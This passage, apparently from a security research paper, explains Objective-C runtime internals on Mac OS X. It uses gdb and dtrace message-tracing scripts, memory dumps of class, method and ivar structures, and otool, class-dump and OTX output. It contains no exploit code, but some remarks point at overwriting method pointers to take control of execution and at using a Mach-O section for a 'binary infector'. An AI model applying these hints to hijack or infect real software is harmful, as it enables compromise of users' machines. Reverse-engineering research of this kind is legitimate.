+This works pretty well but we still hit a situation where sometimes our
+class's name is set to NULL. In this case we take the isa (deref the first
+pointer in the struct) and get the name of that.
+
+The following gdb script will handle this:
+
+#
+# Trace objective-c messages. - nemo 2009
+#
+b dyld_stub_objc_msgSend
+commands 
+        set $id  = *(long *)($esp+4)
+        set $sel = *(long *)($esp+8)
+        if(*(long *)($id+8) != 0)
+                printf "[%s %s]\n", *(long *)($id+8),$sel
+                continue
+        end
+        set $isx = *(long *)($id)
+        printf "[%s %s]\n", *(long *)($isx+8),$sel
+        continue
+end
+
+We could also implement this with dtrace on Mac OS X quite easily.
+
+#!/usr/sbin/dtrace -qs
+
+/* usage: objcdump.d <pid> */
+
+pid$1::objc_msgSend:entry
+{
+        self->isa = *(long *)copyin(arg0,4);
+        printf("-[%s %s]\n",copyinstr(*(long *)copyin(self->isa + 8,
+4)),copyinstr(arg1));
+
+}
+
+Let me correct myself on that, we /should/ be able to implement this with
+dtrace on Mac OS X quite easily. However, dtrace is kind of like looking at
+a beautiful painting through a kids kaleidescope toy. Thanks a lot to twiz
+for helping me out with implementing this.
+
+As you can see, the output of this script is the same as our gdb script,
+however the speed at which the process runs is magnitudes faster.
+
+Now that we're hopefully familiar with how calls to objc_msgSend() work we
+can look at how the ivar's and methods are accessed.
+
+In order to investigate this a little, we can modify our hello.m example
+code a little to include some attributes. To demonstrate this I will use
+the fraction example from [10]. (I'm getting uncreative in my old age ;-) .
+
+-[dcbz@megatron:~/code/fraction]$ ls -lsa
+total 24
+0 drwxr-xr-x   5 dcbz  dcbz   170 Mar 27 10:28 .
+0 drwxr-xr-x  33 dcbz  dcbz  1122 Mar 27 10:17 ..
+8 -rwxr-----   1 dcbz  dcbz   231 Mar 23  2004 Fraction.h
+8 -rwxr-----   1 dcbz  dcbz   339 Mar 24  2004 Fraction.m
+8 -rwxr-----   1 dcbz  dcbz   386 Mar 27  2004 main.m
+
+As you can see, this project is pretty similar to our earlier hello.m
+example.
+
+-[dcbz@megatron:~/code/fraction]$ cat Fraction.h
+#import <Foundation/NSObject.h>
+
+@interface Fraction: NSObject {
+    int numerator;
+    int denominator;
+}
+
+-(void) print;
+-(void) setNumerator: (int) d;
+-(void) setDenominator: (int) d;
+-(int) numerator;
+-(int) denominator;
+@end
+
+Our header file defines a simple interface to a "Fraction" class. This
+class represents the numerator and denominator of a fraction.
+
+It exports the methods setNumerator and setDemonimator in order to modify
+these values, and the methods numerator() and denominator() to get the
+values.
+
+-[dcbz@megatron:~/code/fraction]$ cat Fraction.m
+#import "Fraction.h"
+#import <stdio.h>
+
+@implementation Fraction
+-(void) print {
+    printf( "%i/%i", numerator, denominator );
+}
+
+-(void) setNumerator: (int) n {
+    numerator = n;
+}
+
+-(void) setDenominator: (int) d {
+    denominator = d;
+}
+
+-(int) denominator {
+    return denominator;
+}
+
+-(int) numerator {
+    return numerator;
+}
+@end
+
+The actual implementation of these methods is pretty much what you would
+expect from any OOP language. Get methods return the object's attribute, set
+methods set it.
+
+-[dcbz@megatron:~/code/fraction]$ cat main.m 
+#import <stdio.h>
+#import "Fraction.h"
+
+int main( int argc, const char *argv[] ) {
+    // create a new instance
+    Fraction *frac = [[Fraction alloc] init];
+
+    // set the values
+    [frac setNumerator: 1];
+    [frac setDenominator: 3];
+
+    // print it
+    printf( "The fraction is: " );
+    [frac print];
+    printf( "\n" );
+
+    // free memory
+    [frac release];
+
+    return 0;
+}
+
+As you can see, our main.m file contains code to instantiate an instance of
+the class. It then sets the numerator to 1 and denominator to 3, and prints
+the fraction. Pretty straight forward stuff.
+
+-[dcbz@megatron:~/code/fraction]$  gcc -o fraction Fraction.m main.m
+-framework Foundation
+-[dcbz@megatron:~/code/fraction]$ ./fraction 
+The fraction is: 1/3
+
+Before we fire up gdb and look at this from a debugging perspective, lets
+take a quick look through the source code for what happens after
+objc_msgSend() is called.
+
+        ENTRY   _objc_msgSend
+        CALL_MCOUNTER
+
+// load receiver and selector
+        movl    selector(%esp), %ecx
+        movl    self(%esp), %eax
+
+// check whether selector is ignored
+        cmpl    $ kIgnore, %ecx
+        je      LMsgSendDone            // return self from %eax
+
+// check whether receiver is nil
+        testl   %eax, %eax
+        je      LMsgSendNilSelf
+
+// receiver (in %eax) is non-nil: search the cache
+LMsgSendReceiverOk:
+        movl    isa(%eax), %edx         // class = self->isa
+        CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss
+        movl    $kFwdMsgSend, %edx      // flag word-return for
+_objc_msgForward
+        jmp     *%eax                   // goto *imp
+
+// cache miss: go search the method lists
+LMsgSendCacheMiss:
+        MethodTableLookup WORD_RETURN, MSG_SEND
+        movl    $kFwdMsgSend, %edx      // flag word-return for
+_objc_msgForward
+        jmp     *%eax                   // goto *imp
+
+
+As you can see, objc_msgSend() first moves the receiver and selector into
+eax and ecx respectively. It then tests if the selector is kignore ("?").
+If this is the case, it simply returns the receiver (id).
+
+If the receiver is not NULL, a cache lookup is performed on the method in
+question. If the method is found in the cache, the value in the cache is
+simply called. We'll look into the cache in more detail later in the
+exploitation section.
+
+If the method's address is not in the cache, the "MethodTableLookup" macro
+is used.
+
+.macro MethodTableLookup
+
+        subl    $$4, %esp               // 16-byte align the stack
+        // push args (class, selector)
+        pushl   %ecx
+        pushl   %eax
+        CALL_EXTERN(__class_lookupMethodAndLoadCache)
+        addl    $$12, %esp              // pop parameters and alignment
+.endmacro
+
+From the code above we can see that this macro simply aligns the stack and calls
+__class_lookupMethodAndLoadCache.
+
+This function, checks the cache of the class again, and it's super class
+for the method in question. If it's definitely not in the cache, the method
+list in the class is walked and tested individually for a match. If this
+is not successful the parent of the class is checked and so forth.
+If the method is found, it's called.
+
+Let's look at this process in gdb.
+
+We hit out breakpoint in objc_msgSend().
+
+Breakpoint 7, 0x9470d670 in objc_msgSend ()
+(gdb) stepi
+0x9470d674 in objc_msgSend ()
+(gdb) stepi
+0x9470d678 in objc_msgSend ()
+
+Step over the first two instructions to populate ecx and eax, for our
+convenience.
+
+(gdb) x/s $ecx
+0x1f8d <main+244>:       "setNumerator:"
+
+We can see the method being called (from the SEL argument) is setNumerator:
+
+(gdb) x/x $eax
+0x103240:       0x00003000
+
+We take the ISA...
+
+(gdb) x/x 0x00003000
+0x3000 <.objc_class_name_Fraction>:     0x00003040
+(gdb) 
+0x3004 <.objc_class_name_Fraction+4>:   0xa07fccc0
+(gdb) 
+0x3008 <.objc_class_name_Fraction+8>:   0x00001f7e
+
+Offset this by 8 bytes to find the class name.
+
+(gdb) x/s 0x00001f7e
+0x1f7e <main+229>:       "Fraction"
+
+So this is a call to -[Fraction setNumerator:] (obviously).
+
+        struct objc_class
+        { 
+           struct objc_class* isa;
+           struct objc_class* super_class;
+           const char* name;
+           long version;
+           long info;
+           long instance_size;
+           struct objc_ivar_list* ivars;
+           struct objc_method_list** methodLists;
+           struct objc_cache* cache;
+           struct objc_protocol_list* protocols;
+        };
+
+Remembering our objc_class struct from earlier, we know that the 
+method_lists struct is 28 bytes in.
+
+(gdb) set $classbase=0x3000
+(gdb) x/x $classbase+28
+0x301c <.objc_class_name_Fraction+28>:  0x00103250
+
+So the address of our method_list is 0x00103250.
+
+
+      struct objc_method_list
+        {
+            struct objc_method_list *obsolete;
+            int method_count;
+            struct objc_method method_list[1];
+        }
+
+As you can see, our method_count is 5.
+
+(gdb) x/x 0x00103250+4
+0x103254:       0x00000005
+
+
+        typedef struct objc_method *Method;
+
+        struct objc_method {
+            SEL method_name
+            char *method_types
+            IMP method_imp
+        }
+
+(gdb) x/3x 0x00103250+8
+0x103258:       0x00001fb7      0x00001fd2      0x00001e8b
+(gdb) x/s 0x00001fb7
+0x1fb7 <main+286>:       "numerator"
+(gdb) x/7i  0x00001e8b
+0x1e8b <-[Fraction numerator]>:         push   ebp
+0x1e8c <-[Fraction numerator]+1>:       mov    ebp,esp
+0x1e8e <-[Fraction numerator]+3>:       sub    esp,0x8
+0x1e91 <-[Fraction numerator]+6>:       mov    eax,DWORD PTR [ebp+0x8]
+0x1e94 <-[Fraction numerator]+9>:       mov    eax,DWORD PTR [eax+0x4]
+0x1e97 <-[Fraction numerator]+12>:      leave
+0x1e98 <-[Fraction numerator]+13>:      ret
+
+Now that we see clearly how methods are stored, we can write a small amount
+of gdb script to dump them.
+
+(gdb) set $methods =  0x00103250 + 8
+(gdb) set $i = 1
+(gdb) while($i <= 5)
+ >printf "name: %s\n", *(long *)$methods
+ >printf "addr: 0x%x\n", *(long *)($methods+8)
+ >set $methods += 12
+ >set $i++  
+ >end
+name: numerator
+addr: 0x1e8b
+name: denominator
+addr: 0x1e7d
+name: setDenominator:
+addr: 0x1e6c
+name: setNumerator:
+addr: 0x1e5b
+name: print
+addr: 0x1e26
+
+We can now clearly display all our methods, so lets take a look at how our set
+and get methods actually work.
+
+Firstly, lets take a look at the setDenominator method.
+
+(gdb) x/8i 0x1e6c
+0x1e6c <-[Fraction setDenominator:]>:           push   ebp
+0x1e6d <-[Fraction setDenominator:]+1>:         mov    ebp,esp
+0x1e6f <-[Fraction setDenominator:]+3>:         sub    esp,0x8
+0x1e72 <-[Fraction setDenominator:]+6>:         mov    edx,DWORD PTR [ebp+0x8]
+0x1e75 <-[Fraction setDenominator:]+9>:         mov    eax,DWORD PTR [ebp+0x10]
+0x1e78 <-[Fraction setDenominator:]+12>:        mov    DWORD PTR [edx+0x8],eax
+0x1e7b <-[Fraction setDenominator:]+15>:        leave  
+0x1e7c <-[Fraction setDenominator:]+16>:        ret    
+
+As you can see from the implementation, this function basically takes a
+pointer to the instance of our Fraction class, and stores the argument we
+pass to it at offset 0x8. 
+
+0x1e5b <-[Fraction setNumerator:]>:     push   ebp
+0x1e5c <-[Fraction setNumerator:]+1>:   mov    ebp,esp
+0x1e5e <-[Fraction setNumerator:]+3>:   sub    esp,0x8
+0x1e61 <-[Fraction setNumerator:]+6>:   mov    edx,DWORD PTR [ebp+0x8]
+0x1e64 <-[Fraction setNumerator:]+9>:   mov    eax,DWORD PTR [ebp+0x10]
+0x1e67 <-[Fraction setNumerator:]+12>:  mov    DWORD PTR [edx+0x4],eax
+0x1e6a <-[Fraction setNumerator:]+15>:  leave  
+0x1e6b <-[Fraction setNumerator:]+16>:  ret    
+
+Our setNumerator method is almost identical to this, however it uses offset
+0x4 instead this is all pretty straight forward. So what's the ivars pointer 
+that we saw earlier in our objc_class struct for then, you ask?
+
+        struct objc_class
+        { 
+           struct objc_class* isa;
+           struct objc_class* super_class;
+           const char* name;
+           long version;
+           long info;
+           long instance_size;
+           struct objc_ivar_list* ivars;
+           struct objc_method_list** methodLists;
+           struct objc_cache* cache;
+           struct objc_protocol_list* protocols;
+        };
+
+Our ivars pointer (24 bytes in to the objc_class struct) is required
+because of the reflective properties of the Objective-C language. The ivars
+pointer basically points to all the information about the instance
+variables of the class.
+
+We can explore this in gdb, with our Fraction class some more.
+
+First off, let's put a breakpoint on one of our objc_msgSend calls:
+
+(gdb) break *0x00001f3b 
+Breakpoint 2 at 0x1f3b
+(gdb) c
+Continuing.
+
+Once it's hit, we use the stepi command a few times, to populate the
+registers eax and ecx with the selector and id.
+
+Breakpoint 2, 0x00001f3b in main ()
+(gdb) stepi
+0x00004005 in dyld_stub_objc_msgSend ()
+(gdb) 
+0x94e0c670 in objc_msgSend ()
+(gdb) 
+0x94e0c674 in objc_msgSend ()
+
+Now our eax register contains a pointer to our instantiated class.
+
+(gdb) x/x $eax
+0x103230:       0x00003000
+
+We display the first 4 bytes at eax to retrieve the ISA pointer.
+
+Then we dump a bunch of bytes at that address.
+
+(gdb) x/10x 0x3000
+0x3000 <.objc_class_name_Fraction>:     0x00003040      0xa06e3cc0
+0x00001f7e      0x00000000
+0x3010 <.objc_class_name_Fraction+16>:  0x00ba4001      0x0000000c
+0x000030c4      0x00103240
+0x3020 <.objc_class_name_Fraction+32>:  0x001048d0      0x00000000
+
+So according to our previous logic, 24 bytes in we should have the 
+ivars pointer. Therefore in this case our ivars pointer is:
+
+	0x000030c4
+
+Before we continue dumping memory here, lets take a look at the struct
+definitions for what we're seeing.
+
+The pointer we just found, points to a struct of type "objc_ivar_list"
+this struct looks like so:
+
+struct objc_ivar_list {
+    int ivar_count
+    /* variable length structure */
+    struct objc_ivar ivar_list[1]
+}
+
+So we can dump the count, trivially in gdb.
+
+(gdb) x/x 0x000030c4
+0x30c4 <.objc_class_name_Fraction+196>: 0x00000002
+
+And see that our Fraction class has 2 ivars. This makes sense, numerator
+and denominator. 
+
+Following our count is an array of objc_ivar structs, one for each instance
+variable of the class. The definition for this struct is as follows:
+
+struct objc_ivar {
+    char *ivar_name
+    char *ivar_type
+    int ivar_offset
+}  
+
+So lets start dumping our ivars and see where it takes us.
+
+(gdb)   
+0x30c8 <.objc_class_name_Fraction+200>: 0x00001fb7 // ivar_name.
+(gdb) 
+0x30cc <.objc_class_name_Fraction+204>: 0x00001fd9 // ivar_type.
+(gdb) 
+0x30d0 <.objc_class_name_Fraction+208>: 0x00000004 // ivar_offset.
+
+So if we dump the name and type, we can see that the first instance
+variable we are looking at is the numerator.
+
+(gdb) x/s 0x00001fb7
+0x1fb7 <main+286>:       "numerator"
+(gdb) x/s 0x00001fd9
+0x1fd9 <main+320>:       "i"
+
+The "i" in the type string means that we're looking at an integer.
+The int ivar_offset is set to 0x4.  This means that when a Fraction class
+is allocated, 4 bytes into the allocation we can find the numerator. This
+matches up with the code in our setNumerator and makes sense.
+
+We can repeat the process with the next element to verify our logic.
+
+(gdb) 
+0x30d4 <.objc_class_name_Fraction+212>: 0x00001fab
+(gdb) 
+0x30d8 <.objc_class_name_Fraction+216>: 0x00001fd9
+(gdb) 
+0x30dc <.objc_class_name_Fraction+220>: 0x00000008
+(gdb) x/s 0x00001fab
+0x1fab <main+274>:       "denominator"
+(gdb) x/s 0x00001fd9
+0x1fd9 <main+320>:       "i"
+
+Again, as we can see, the denominator is an integer and is 0x8 bytes offset
+into the allocation for this object.
+
+Hopefully that makes the Objective-C runtime in memory relatively clear.
+
+------[ 3.2 - The __OBJC Segment
+
+In this section I will go over how the data mentioned in the previous
+section is stored inside the Mach-O binary.
+
+I'm going to try and avoid going into the Mach-O format as much as
+possible. This has already been covered to death, if you need to read about
+the file format check out [6].
+
+Basically, files containing Objective-C code have an extra Mach-O segment
+called the __OBJC segment. This segment consists of a bunch of different
+sections, each containing different information pertinent to the
+Objective-C runtime.
+
+The output below from the otool -l command shows the sizes/load addresses
+and flags etc for our __OBJC sections in the hello binary we compiled
+earlier in the paper.
+
+
+-[dcbz@megatron:~/code/HelloWorld/build]$ otool -l hello
+
+...
+
+Load command 3
+      cmd LC_SEGMENT
+  cmdsize 668
+  segname __OBJC
+   vmaddr 0x00003000
+   vmsize 0x00001000
+  fileoff 8192
+ filesize 4096
+  maxprot 0x00000007
+ initprot 0x00000003
+   nsects 9
+    flags 0x0
+Section
+  sectname __class
+   segname __OBJC
+      addr 0x00003000
+      size 0x00000030
+    offset 8192
+     align 2^5 (32)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __meta_class
+   segname __OBJC
+      addr 0x00003040
+      size 0x00000030
+    offset 8256
+     align 2^5 (32)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __inst_meth
+   segname __OBJC
+      addr 0x00003080
+      size 0x00000020
+    offset 8320
+     align 2^5 (32)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __instance_vars
+   segname __OBJC
+      addr 0x000030a0
+      size 0x00000010
+    offset 8352
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __module_info
+   segname __OBJC
+      addr 0x000030b0
+      size 0x00000020
+    offset 8368
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __symbols
+   segname __OBJC
+      addr 0x000030d0
+      size 0x00000010
+    offset 8400
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __message_refs
+   segname __OBJC
+      addr 0x000030e0
+      size 0x00000010
+    offset 8416
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000005
+ reserved1 0
+ reserved2 0
+Section
+  sectname __cls_refs
+   segname __OBJC
+      addr 0x000030f0
+      size 0x00000004
+    offset 8432
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __image_info
+   segname __OBJC
+      addr 0x000030f4
+      size 0x00000008
+    offset 8436
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+
+This output shows us where in the file itself each section resides. It also
+shows us where that portion will be mapped into memory in the address space
+of the process, as well as the size of each mapping.
+
+The first section in the __OBJC segment we will look at is the __class
+section. To understand this we'll take a quick look at how ida displays this
+section.
+
+__class:00003000 ; ===========================================================================
+__class:00003000
+__class:00003000 ; Segment type: Pure data
+__class:00003000 ; Segment alignment '32byte' can not be represented in assembly
+__class:00003000 __class         segment para public 'DATA' use32
+__class:00003000                 assume cs:__class
+__class:00003000                 ;org 3000h
+__class:00003000                 public _objc_class_name_Talker
+__class:00003000 _objc_class_name_Talker __class_struct <offset stru_3040, offset aNsobject, offset aTalker, 0,\
+__class:00003000                                         ; DATA XREF: __symbols:000030B0o
+__class:00003000                                 1, 4, 0, offset dword_3070, 0, 0> ; "NSObject"
+__class:00003028                 align 10h
+__class:00003028 __class         ends
+__class:00003028
+
+From IDA's dump of this section (from our hello binary) we can see that
+this section is pretty much where our objc_class structs are stored.
+
+        struct objc_class
+        { 
+           struct objc_class* isa;
+           struct objc_class* super_class;
+           const char* name;
+           long version;
+           long info;
+           long instance_size;
+           struct objc_ivar_list* ivars;
+           struct objc_method_list** methodLists;
+           struct objc_cache* cache;
+           struct objc_protocol_list* protocols;
+        };
+
+More particularly though, this is where the ISA classes are stored.
+An interesting note, is that from what I've seen gcc seems to almost always
+pick 0x3000 for this section. It's pretty reliable to attempt to utilize
+this area in an exploit if the need arises.
+
+The next section we'll look at is the __meta_class section.
+
+__meta_class:00003040 ; ===========================================================================
+__meta_class:00003040
+__meta_class:00003040 ; Segment type: Pure data
+__meta_class:00003040 ; Segment alignment '32byte' can not be represented in assembly
+__meta_class:00003040 __meta_class    segment para public 'DATA' use32
+__meta_class:00003040                 assume cs:__meta_class
+__meta_class:00003040                 ;org 3040h
+__meta_class:00003040 stru_3040       __class_struct <offset aNsobject, offset aNsobject, offset aTalker, 0,\
+__meta_class:00003040                                         ; DATA XREF: __class:_objc_class_name_Talkero
+__meta_class:00003040                                 2, 30h, 0, 0, 0, 0> ; "NSObject"
+__meta_class:00003068                 align 10h
+__meta_class:00003068 __meta_class    ends
+__meta_class:00003068
+
+Again, as you can see this section is filled with objc_class structs.
+However this time the structs represent the super_class structs. We can see
+that the __class section references this one.
+
+The __inst_meth section (shown below) contains pointers to the various
+methods used by the classes. These pointers can be changed to gain control
+of execution.
+
+__inst_meth:00003070 ; ===========================================================================
+__inst_meth:00003070
+__inst_meth:00003070 ; Segment type: Pure data
+__inst_meth:00003070 __inst_meth     segment dword public 'DATA' use32
+__inst_meth:00003070                 assume cs:__inst_meth
+__inst_meth:00003070                 ;org 3070h
+__inst_meth:00003070 dword_3070      dd 0                    ; DATA XREF: __class:_objc_class_name_Talkero
+__inst_meth:00003074                 dd 1
+__inst_meth:00003078                 dd offset aSay, offset aV12@048, offset __Talker_say__ ; "say:"
+__inst_meth:00003078 __inst_meth     ends
+__inst_meth:00003078
+
+The __message_refs section basically just contains pointers to all the
+selectors used throughout the application. The strings themselves are
+contained in the __cstring section, however __message_refs contains all the
+pointers to them.
+
+__message_refs:000030B4 ; ===========================================================================
+__message_refs:000030B4
+__message_refs:000030B4 ; Segment type: Pure data
+__message_refs:000030B4 __message_refs  segment dword public 'DATA' use32
+__message_refs:000030B4                 assume cs:__message_refs
+__message_refs:000030B4                 ;org 30B4h
+__message_refs:000030B4 off_30B4        dd offset aRelease      ; DATA XREF: _main+68o
+__message_refs:000030B4                                         ; "release"
+__message_refs:000030B8 off_30B8        dd offset aSay          ; DATA XREF: _main+47o
+__message_refs:000030B8                                         ; "say:"
+__message_refs:000030BC off_30BC        dd offset aInit         ; DATA XREF: _main+2Do
+__message_refs:000030BC                                         ; "init"
+__message_refs:000030C0 off_30C0        dd offset aAlloc        ; DATA XREF: _main+17o
+__message_refs:000030C0 __message_refs  ends                    ; "alloc"
+__message_refs:000030C0
+
+The __cls_refs section contains pointers to the names of all the classes in
+our Application. The strings themselves again are stored in the cstring
+section, however the __cls_refs section simply contains an array of
+pointers to each of them.
+
+__cls_refs:000030C4 ; ===========================================================================
+__cls_refs:000030C4
+__cls_refs:000030C4 ; Segment type: Regular
+__cls_refs:000030C4 __cls_refs      segment dword public '' use32
+__cls_refs:000030C4                 assume cs:__cls_refs
+__cls_refs:000030C4                 ;org 30C4h
+__cls_refs:000030C4                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
+__cls_refs:000030C4 unk_30C4        db 0C9h ; +             ; DATA XREF: _main+Do
+__cls_refs:000030C5                 db  1Fh
+__cls_refs:000030C6                 db    0
+__cls_refs:000030C7                 db    0
+__cls_refs:000030C7 __cls_refs      ends
+__cls_refs:000030C7
+
+I'm not really sure what the __image_info section is used for. But it's
+good for us to use in our binary infector. :P
+
+__image_info:000030C8 ; ===========================================================================
+__image_info:000030C8
+__image_info:000030C8 ; Segment type: Regular
+__image_info:000030C8 __image_info    segment dword public '' use32
+__image_info:000030C8                 assume cs:__image_info
+__image_info:000030C8                 ;org 30C8h
+__image_info:000030C8                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
+__image_info:000030C8                 align 10h
+__image_info:000030C8 __image_info    ends
+__image_info:000030C8
+
+One section that was missing from our hello binary but is typically in all
+Objective-C compiled files is the __instance_vars section.
+
+Section
+  sectname __instance_vars
+   segname __OBJC
+      addr 0x000030c4
+      size 0x0000001c
+    offset 8388
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+
+The reason this was omitted from our hello binary is due to the fact that
+our program has no classes with instance vars. Talker simply had a method
+which took a string and printed it.
+
+The __instance_vars section holds the ivars structs mentioned at the end of
+the previous chapter. It begins with a count, and is followed up by an
+array of objc_ivar structs, as described previously.
+
+        struct objc_ivar {
+            char *ivar_name
+            char *ivar_type
+            int ivar_offset
+        }
+
+I skipped a few of the self explanatory sections like symbols. But
+hopefully this served as an introduction to the information available to us
+in the binary. In the next sections we'll look at tools to turn this
+information into something more human readable.
+
+--[ 4 - Reverse Engineering Objective-C Applications.
+
+As I'm sure you can imagine having read this far, with such a large variety
+of information present in the binary and in memory at runtime reverse
+engineering Objective-C applications is quite a bit easier than their C or
+C++ counterparts.
+
+In the following section I will run through some of the tools and methods
+that help out when attempting to reverse engineer Objective-C applications
+on Mac OSX both on disk and at runtime.
+
+------[ 4.1 - Static analysis toolset
+
+First up, lets take a look at how we can access the information statically
+from the disk. There exists a variety of tools which help us with this
+task.
+
+The first tool, is one we've used previously in this paper, "otool".
+Otool on Mac OS X is basically the equivalent of objdump on other
+platforms (NOTE: objdump can obviously be compiled for Mac OS X too.).
+Otool will not only dump assembly code for particular sections as well as
+header information for Mach-O files, but it can display our Objective-C
+information as well. 
+
+By using the "-o" flag to otool we can tell it to dump the Objective-C
+segment in a readable fashion. The output below shows us running this
+command against our hello binary from earlier.
+
+-[dcbz@megatron:~/code/HelloWorld/build]$ otool -o hello  
+hello:
+Objective-C segment
+Module 0x30b0
+    version 7
+       size 16
+       name 0x00001fa8
+     symtab 0x000030d0
+	sel_ref_cnt 0
+	refs 0x00000000 (not in an __OBJC section)
+	cls_def_cnt 1
+	cat_def_cnt 0
+	Class Definitions
+	defs[0] 0x00003000
+		      isa 0x00003040
+	      super_class 0x00001fa9
+		     name 0x00001fb2
+		  version 0x00000000
+		     info 0x00000001
+	    instance_size 0x00000008
+		    ivars 0x000030a0
+		       ivar_count 1
+			ivar_name 0x00001fc6
+			ivar_type 0x00001fde
+		      ivar_offset 0x00000004
+		  methods 0x00003080
+		         obsolete 0x00000000
+		     method_count 2
+		      method_name 0x00001fc1
+		     method_types 0x00001fd4
+		       method_imp 0x00001f13 
+		      method_name 0x00001fb9
+		     method_types 0x00001fca
+		       method_imp 0x00001f02 
+		    cache 0x00000000
+		protocols 0x00000000 (not in an __OBJC section)
+	Meta Class
+		      isa 0x00001fa9
+	      super_class 0x00001fa9
+		     name 0x00001fb2
+		  version 0x00000000
+		     info 0x00000002
+	    instance_size 0x00000030
+		    ivars 0x00000000 (not in an __OBJC section)
+		  methods 0x00000000 (not in an __OBJC section)
+		    cache 0x00000000
+		protocols 0x00000000 (not in an __OBJC section)
+Module 0x30c0
+    version 7
+       size 16
+       name 0x00001fa8
+     symtab 0x00002034 (not in an __OBJC section)
+Contents of (__OBJC,__image_info) section
+  version 0
+    flags 0x0 RR
+
+As you can see, this output provides us with a variety of information such
+as the addresses of our class definitions, their ivar count, name and types
+as well as their offsets into the appropriate section.
+
+Most of the times however, it can be more useful to see a human readable interface
+description for our binary. This can be arranged using the class-dump tool
+available from [14].
+
+-[dcbz@megatron:~/code/HelloWorld/build]$
+/Volumes/class-dump-3.1.2/class-dump hello 
+/*
+ *     Generated by class-dump 3.1.2.
+ *
+ *     class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve
+ *     Nygard.
+ */
+
+/*
+ * File: hello
+ * Arch: Intel 80x86 (i386)
+ */
+
+@interface Talker : NSObject
+{
+}
+
+- (void)say:(char *)fp8;
+
+@end
+
+The output above shows class-dump being run against our small hello binary
+from the previous sections. Our example is pretty tiny though, but it still
+demonstrates the format in which class-dump will display it's information.
+
+By running this tool against Safari we can get a more clear picture of the
+kind of information class-dump can give us.
+
+/*
+ *     Generated by class-dump 3.1.2.
+ *
+ *     class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve
+ *     Nygard.
+ */
+
+struct AliasRecord;
+
+struct CGAffineTransform {
+    float a;
+    float b;
+    float c;
+    float d;
+    float tx;
+    float ty;
+};
+
+struct CGColor;
+
+struct CGImage;
+
+struct CGPoint {
+    float x;
+    float y;
+};
+
+...
+
+@protocol NSDraggingInfo
+- (id)draggingDestinationWindow;
+- (unsigned int)draggingSourceOperationMask;
+- (struct _NSPoint)draggingLocation;
+- (struct _NSPoint)draggedImageLocation;
+- (id)draggedImage;
+- (id)draggingPasteboard;
+- (id)draggingSource;
+- (int)draggingSequenceNumber;
+- (void)slideDraggedImageTo:(struct _NSPoint)fp8;
+- (id)namesOfPromisedFilesDroppedAtDestination:(id)fp8;
+@end
+
+...
+
+Class-dump is a very valuable tool and definitely one of the first things
+that I run when trying to understand the purpose of an Objective-C binary. 
+
+Back when the earth was flat, and Mac OS X ran mostly on PowerPC
+architecture Braden started work on a really cool tool called "code-dump".
+Code-dump was built on top of the class-dump source and rather than just
+dumping class definitions, it was designed to decompile Objective-C code.
+
+Unfortunately code-dump has never been updated since then, but to me the
+idea is still very sound. It would be really cool to see some Objective-C
+support added to Hex-rays in the future. I think you could get some really
+reliable output with that.
+
+However, until the day arrives when someone bothers working on a real
+decompiler for intel Objective-C binaries the closest thing we have is
+called OTX.app. OTX (hosted on one of the coolest domains ever.) [15] is a
+gui tool for Mac OS X which takes a Mach-O binary as input and then uses
+otool output to dump an assembly listing. It is capable of querying the
+Objective-C sections of the binary for information and then populating the
+assembly with comments.
+
+Let's take a look at the output from OTX running against the Safari web
+browser.
+
+-(id)[AppController(FileInternal) _closeMenuItem]
++0   00003f70  55               pushl %ebp
++1   00003f71  89e5             movl %esp,%ebp
++3   00003f73  83ec18           subl $0x18,%esp
++6   00003f76  a1cc6c1e00       movl 0x001e6ccc,%eax    _fileMenu
++11  00003f7b  89442404         movl %eax,0x04(%esp)
++15  00003f7f  8b4508           movl 0x08(%ebp),%eax
++18  00003f82  890424           movl %eax,(%esp)
++21  00003f85  e812ee2000       calll 0x00212d9c  -[(%esp,1) _fileMenu]
++26  00003f8a  8b15bc6c1e00     movl 0x001e6cbc,%edx    performClose:
++32  00003f90  c744240800000000 movl $0x00000000,0x08(%esp)
++40  00003f98  8954240c         movl %edx,0x0c(%esp)
++44  00003f9c  8b15c46c1e00     movl 0x001e6cc4,%edx  
+                                              itemWithTarget:andAction:
++50  00003fa2  890424           movl %eax,(%esp)
++53  00003fa5  89542404         movl %edx,0x04(%esp)
++57  00003fa9  e8eeed2000       calll 0x00212d9c       
+                                  -[(%esp,1) itemWithTarget:andAction:]
++62  00003fae  c9               leave
++63  00003faf  c3               ret
+
+The comments in the above output are pretty clear, they show the name of
+the method as well as which method and attribute are being used in the
+assembly.
+
+Unfortunately, working from a .txt file containing assembly is still pretty
+painful, these days most people are using IDA pro to navigate an assembly
+listing. Back when I was first doing this research I wrote an ida python
+script which would parse the .txt file output from OTX, and steal all the
+comments, then add them to IDA. It also took the method names and renamed
+the functions appropriately and added cross refs where appropriate. 
+
+Unfortunately I haven't been able to locate this script since I got back
+from my forced time off :( If I do find it, I'll put it up on felinemenace
+in case anyone is interested. Thankfully since I've been away it seems a
+few people have recreated IDC scripts to pull information from the __OBJC
+segment and populate the IDB.
+
+I'm sure you can google around and find them yourselves, but regardless a
+couple are available at [16] and [17].
+
+
+------[ 4.2 - Runtime analysis toolset
+
+In the previous section we explored how to access the Objective-C
+information present in the binary without executing it. In this section I
